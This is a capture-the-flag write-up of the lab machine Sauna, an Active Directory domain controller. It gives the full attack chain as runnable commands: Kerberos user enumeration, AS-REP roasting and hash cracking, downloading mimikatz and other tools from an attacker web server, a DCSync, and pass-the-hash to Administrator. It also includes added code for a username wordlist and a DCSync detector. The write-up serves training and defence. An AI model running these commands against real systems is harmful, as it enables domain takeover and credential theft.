Sauna is an easy difficulty Windows machine that features Active Directory enumeration and exploitation. Possible usernames can be derived from employee full names listed on the website. With these usernames, an ASREPRoasting attack can be performed, which results in a hash for an account that doesn’t require Kerberos pre-authentication. This hash can be subjected to an offline brute-force attack in order to recover the plaintext password for a user that is able to WinRM to the box. Running WinPEAS reveals that another system user has been configured to automatically log in, and it identifies their password. This second user also has Windows Remote Management permissions. BloodHound reveals that this user has the DS-Replication-Get-Changes-All extended right, which allows them to dump password hashes from the Domain Controller in a DCSync attack. Executing this attack returns the hash of the primary domain administrator, which can be used with Impacket’s psexec.py in order to gain a shell on the box as NT AUTHORITY\SYSTEM.
Enumeration
Nmap
The nmap command below performs a full TCP port scan (-p-) with version detection and default scripts (-sVC) against the target, skipping host discovery (-Pn) because Windows hosts often drop ICMP probes. An overview of the results follows:
```
nmap 10.10.10.175 -sVC -Pn -p- -vvvv
```
Output:
```
PORT STATE SERVICE REASON VERSION
```
Interesting things:
- Port 53: DNS.
- Port 80: HTTP, serving a site titled “Egotistical Bank :: Home.”
- Port 88: Kerberos, which together with LDAP and DNS indicates that the host is a Domain Controller.
- Port 135: Microsoft Windows RPC.
- Ports 139 and 445: SMB.
- Port 389: LDAP for the Active Directory domain “EGOTISTICAL-BANK.LOCAL.”
The output indicates that the host is a Domain Controller for the domain EGOTISTICAL-BANK.LOCAL. We add this name to /etc/hosts so that Kerberos tooling and the later evil-winrm command can resolve it.
Enum4linux
```
enum4linux 10.10.10.175
```
Output
```
Target ........... EGOTISTICALBANK
```
The output shows the NetBIOS domain name, EGOTISTICALBANK, which differs from the DNS name found above (EGOTISTICAL-BANK.LOCAL). We add this short name to /etc/hosts as well.
rpcclient
```
rpcclient -U '' -N EGOTISTICALBANK
```
Output:
```
rpcclient $> enumdomusers
```
The null-session attempt to enumerate domain users with enumdomusers fails with access denied, so anonymous RPC enumeration is closed off on this host.
LDAP (nmap ldap scripts)
```
nmap -n -sV --script "ldap* and not brute" 10.10.10.175
```
Output:
The nmap LDAP scripts (anonymous bind) reveal one user, Hugo Smith, but GetNPUsers.py does not return a hash for him.
I add him to my user list anyway.
Website
While browsing the website I found the team page. ![[Pasted image 20230823103018.png]]
From the names on it we can build a list of users like the one below:
```
Fergus Smith
```
kerberos user enum (nmap)
We can also enumerate the users with nmap and the krb5-enum-users script, which sends AS-REQs and distinguishes existing from non-existing principals by the KDC error:
```
nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='EGOTISTICAL-BANK.LOCAL',userdb=newusers.txt 10.10.10.175
```
Output:
```
PORT STATE SERVICE
```
The user hsmith matches Hugo Smith from the LDAP result above, which reveals the naming convention: first initial followed by surname.
AS-REP Roasting
AS-REP Roasting against hsmith fails, because that account still requires pre-authentication, but it may work on a member of the team:
```
/usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/hsmith -format john -outputfile hash
```
hsmith is not on the team page, but the account shows how usernames are built from first and last name:
- Hugo Smith -> hsmith
Applying the same convention to the team gives:
- Fergus Smith -> fsmith
- Shaun Coins -> scoins
- Hugo Bear -> hbear
- Steven Kerb -> skerb
- Bowle Taylor -> btaylor
- Sophie Driver -> sdriver
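Deriving usernames by hand works for six names, but a real engagement usually has dozens and the convention is not always known in advance. The following script is an added example, not code from the original writeup: it takes the team names listed above and generates candidates for the convention hsmith revealed (first initial plus surname, tried first) as well as other common corporate patterns, producing a deduplicated wordlist that can be fed to kerbrute or the krb5-enum-users script. The pattern list and the output filename newusers.txt are assumptions chosen for this example.

```python
# Added example (not part of the original writeup): build a candidate
# username wordlist from the full names scraped from the website.
# The pattern "{fi}{l}" (first initial + surname) is the one Sauna uses
# (Hugo Smith -> hsmith); the rest are other common corporate formats.
from typing import Iterable

# Names as listed on the Egotistical Bank team page in the writeup.
TEAM = [
    "Fergus Smith", "Shaun Coins", "Hugo Bear",
    "Steven Kerb", "Bowle Taylor", "Sophie Driver",
]

# Format strings over first name (f), last name (l) and their initials
# (fi, li). Order matters: the most likely convention comes first so it
# is tried first by the enumeration tool. This list is an assumption.
PATTERNS = [
    "{fi}{l}", "{f}{l}", "{f}.{l}", "{f}_{l}", "{f}-{l}",
    "{l}{fi}", "{l}.{f}", "{l}{f}", "{f}", "{l}", "{fi}.{l}", "{f}{li}",
]


def candidates(full_name: str, patterns: Iterable[str] = PATTERNS) -> list[str]:
    """Return deduplicated lowercase username candidates for one full name.

    Middle names are ignored; a single-word name is returned as-is.
    """
    parts = full_name.strip().lower().split()
    if len(parts) < 2:
        return parts
    first, last = parts[0], parts[-1]
    seen: set[str] = set()
    out: list[str] = []
    for pattern in patterns:
        user = pattern.format(f=first, l=last, fi=first[0], li=last[0])
        if user not in seen:
            seen.add(user)
            out.append(user)
    return out


def wordlist(names: Iterable[str], patterns: Iterable[str] = PATTERNS) -> list[str]:
    """Merge candidates for all names, keeping first-seen order and no duplicates."""
    seen: set[str] = set()
    out: list[str] = []
    for name in names:
        for user in candidates(name, patterns):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Write the list in the format kerbrute userenum / nmap userdb expect:
    # one username per line.
    users = wordlist(TEAM)
    with open("newusers.txt", "w", encoding="utf-8") as fh:
        fh.write("\n".join(users) + "\n")
    print(f"wrote {len(users)} candidates to newusers.txt")
```

Run it and pass newusers.txt to `kerbrute userenum -d EGOTISTICAL-BANK.LOCAL newusers.txt --dc 10.10.10.175`; once one pattern is confirmed (fsmith here), restrict PATTERNS to that pattern to avoid sending needless AS-REQs, which are logged on the DC as 4768/4771 events.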
kerberos userenum (kerbrute)
I’ve created a list with the users above:
```
cat team
```
Now with kerbrute we can use userenum to check which of them are valid. kerbrute sends an AS-REQ per name and reports the ones for which the KDC does not answer with KDC_ERR_C_PRINCIPAL_UNKNOWN:
```
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL team --dc 10.10.10.175
```

fsmith is the only valid username. We can enumerate more with another wordlist (here a large password list is reused as a username list):
```
kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt --dc 10.10.10.175
```

We found a few other users:
```
hsmith
```
First User
Dump the TGT hash
I used Impacket’s GetNPUsers.py to request an AS-REP for fsmith. Because the account has “Do not require Kerberos preauthentication” set, the KDC returns a response whose encrypted part is derived from the user’s password, which can be cracked offline:
```
/usr/share/doc/python3-impacket/examples/GetNPUsers.py -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/fsmith -format john -outputfile hash
```
Output:
```
[*] Cannot authenticate fsmith, getting its TGT
```
The -outputfile option writes the hash, in john format, to a file named hash.
Crack the hash
With john I managed to crack the hash against rockyou:
```
john --wordlist=/usr/share/wordlists/SecLists/Passwords/Leaked-Databases/rockyou.txt hash
```
Output:
```
Thestrokes23 ([email protected])
```

Remote Windows Access with Evil-Winrm
Let’s get a shell with evil-winrm, since this user is allowed to WinRM to the box:
```
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23
```

Enumeration
Enumeration with BloodHound
First we need to collect the data; I’m using SharpHound.exe for this task.
I serve the file from a simple web server on my machine and fetch it from the target:
```
cd /tools/
```
I could also use the upload function of evil-winrm instead.
```
Invoke-WebRequest -Uri "http://10.10.14.23:8000/SharpHound.exe" -OutFile "SharpHound.exe"
```
Running SharpHound on the target produces a zip file; drag and drop it into BloodHound.
We can see a new user and also the next target: SVC_LOANMGR.
Enumeration with WinPEAS
As with SharpHound.exe, I download winPEAS.ps1:
```
Invoke-WebRequest -Uri "http://10.10.14.23:8000/winPEAS.ps1" -OutFile "winPEAS.ps1"
```
winPEAS finds an autologon credential stored in cleartext under the Winlogon registry key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, values DefaultUserName and DefaultPassword), which any local user can read:
Username: svc_loanmanager
Password: Moneymakestheworldgoround!
svc_loanmanager corresponds to the SVC_LOANMGR account seen in BloodHound.
Second User
Evil-Winrm
Get a shell as SVC_LOANMGR; the Winlogon password works for that account:
```
evil-winrm -i 10.10.10.175 -u SVC_LOANMGR -p Moneymakestheworldgoround!
```

Mimikatz DCSync
The web server is still running, so I download mimikatz.exe and perform a DCSync attack with its lsadump::dcsync module. DCSync abuses the DS-Replication-Get-Changes-All right that BloodHound flagged: the account asks the DC to replicate the Administrator object, and the DC hands over the stored secrets as it would to another DC.
```
Invoke-WebRequest -Uri "http://10.10.14.23:8000/mimikatz.exe" -OutFile "mimikatz.exe"
```
Output:
The NTLM hash of the Administrator account in the result is: 823452073d75b9d1cf70ebdf86c7f98e.
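From the defender’s side, DCSync is visible on the Domain Controller as Security event 4662 with the replication control-access-right GUIDs in its Properties field, requested by an account that is not a Domain Controller. The following detector is an added example, not part of the original writeup or of any tool it uses: it flags 4662 records where a non-computer account (one whose name does not end in “$”) requests DS-Replication-Get-Changes or DS-Replication-Get-Changes-All. The events are constructed for this example and use the writeup’s account names; the dictionary-based event shape is an assumption standing in for parsed EVTX or SIEM records.

```python
# Added example (not part of the original writeup): minimal DCSync detector
# over Windows Security event 4662 records. The replication rights GUIDs
# below are the well-known control-access-right GUIDs that a DCSync request
# exercises. Domain controllers replicate legitimately, so computer accounts
# (sAMAccountName ending in "$") are excluded; everything else is suspicious.
from typing import Iterable

REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}


def replication_rights(properties: str) -> list[str]:
    """Return the names of replication rights present in a 4662 Properties string."""
    props = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def is_dcsync(event: dict) -> bool:
    """True when a non-computer account requests any replication right."""
    if event.get("EventID") != 4662:
        return False
    subject = event.get("SubjectUserName", "")
    if subject.endswith("$"):  # DC computer accounts replicate legitimately
        return False
    return bool(replication_rights(event.get("Properties", "")))


def find_dcsync(events: Iterable[dict]) -> list[tuple[str, list[str]]]:
    """Return (account, [rights]) for every event that looks like DCSync."""
    return [
        (e["SubjectUserName"], replication_rights(e["Properties"]))
        for e in events
        if is_dcsync(e)
    ]


# Constructed sample records (hypothetical, not captured from the box).
# Real 4662 Properties fields also carry access-mask tokens; only the
# GUIDs matter for this check.
SAMPLE_EVENTS = [
    {   # benign: the DC's own machine account replicating
        "EventID": 4662, "SubjectUserName": "SAUNA$",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # DCSync: a user account requesting both replication rights
        "EventID": 4662, "SubjectUserName": "svc_loanmgr",
        "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    },
    {   # unrelated object access by a user (placeholder GUID)
        "EventID": 4662, "SubjectUserName": "fsmith",
        "Properties": "{00000000-0000-0000-0000-000000000000}",
    },
    {   # different event ID entirely (logon), ignored
        "EventID": 4624, "SubjectUserName": "svc_loanmgr", "Properties": "",
    },
]

if __name__ == "__main__":
    for account, rights in find_dcsync(SAMPLE_EVENTS):
        print(f"possible DCSync by {account}: {', '.join(rights)}")
```

The check depends on “Audit Directory Service Access” being enabled for success events on the DC; without it no 4662 is written and the DCSync is invisible in the Security log. Excluding every account ending in “$” is a simplification: a stricter version would compare the subject against the actual list of DC computer accounts, since attackers can also DCSync from a compromised machine account.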
NT AUTHORITY\SYSTEM
Evil-Winrm
With the NTLM hash of the Administrator account we can pass the hash to evil-winrm (-H) instead of a password; the host name resolves through the /etc/hosts entry added during enumeration. This gives an Administrator shell; the same hash used with Impacket’s psexec.py (-hashes) yields NT AUTHORITY\SYSTEM as described in the introduction.
```
evil-winrm -i EGOTISTICAL-BANK.LOCAL -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e
```
